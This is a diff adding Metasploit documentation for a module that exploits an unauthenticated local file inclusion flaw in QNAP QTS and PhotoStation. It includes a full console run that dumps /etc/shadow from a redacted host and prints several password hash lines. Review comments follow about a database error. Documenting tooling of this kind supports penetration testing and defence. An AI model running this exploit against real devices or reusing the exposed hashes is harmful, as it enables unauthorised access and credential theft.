documentation/modules/auxiliary/gather/qnap_lfi.md

```diff
@@ -0,0 +1,119 @@
+## Introduction
+
+This module abuses a vulnerability in QNAP QTS and PhotoStation that allows an
+unauthenticated user to download files off the file system, and because the server
+runs as root, it's possible to include sensitive files, including ssh private keys and
+password hashes.
+
+## Options
+
+**FILEPATH**
+
+Set this to the file you want to dump. The default is `/etc/shadow`.
+
+**PRINT**
+
+Whether to print file contents to the screen, defaults to true.
+
+## Usage
+
+Dumping hashes from /etc/shadow
+
+```
+msf5 auxiliary(gather/qnap_lfi) > run
+[*] Running module against [REDACTED]
+
+[*] Getting the Album Id
+[+] Got Album Id : cJinsP
+[*] Getting the Access Code
+[+] Got Access Code : NjU1MzR8MXwxNTkwNjk0MDIy
+[*] Attempting Local File Inclusion
+[+] File download successful, file saved in /home/redouane/.msf4/loot/20200528212705_default_[REDACTED]_qnap.http_394810.bin
+[+] File content:
+admin:$1$$CoERg7ynjYLsj2j4glJ34.:14233:0:99999:7:::
+guest:$1$$ysap7EeB9ODCrO46Psdbq/:14233:0:99999:7:::
+httpdusr:!:16762:0:99999:7:::
+Redouane:$1$$EBquHgqfhZQKEdjd8dqWh1:16935:0:99999:7:::
+[sshd]:!:17496:0:99999:7:::
+[appuser]:!:18036:0:99999:7:::
+af4de148:$1$$Wb6XAeBxv2R5HfU8uyZc.1:18407:0:99999:7:::
+[*] adding the /etc/shadow entries to the database
+[*] Auxiliary module execution completed
+msf5 auxiliary(gather/qnap_lfi) > loot
+
+Loot
+====
+
+host           service  type       name    content                   info  path
+----           -------  ----       ----    -------                   ----  ----
+[REDACTED]              qnap.http  shadow  application/octet-stream        /home/redouane/.msf4/loot/20200528212705_default_[REDACTED]_qnap.http_394810.bin
+
+msf5 auxiliary(gather/qnap_lfi) > 
+
```

Comment:
can you show the creds command here plz

Reply:
Having issues with the database locally, couldn't test the creds command (`ActiveRecord::RecordInvalid Validation failed: Proto is not included in the list`)

Reply:
@jmartin-r7 thoughts? not sure about 'proto' but 'protocol' is...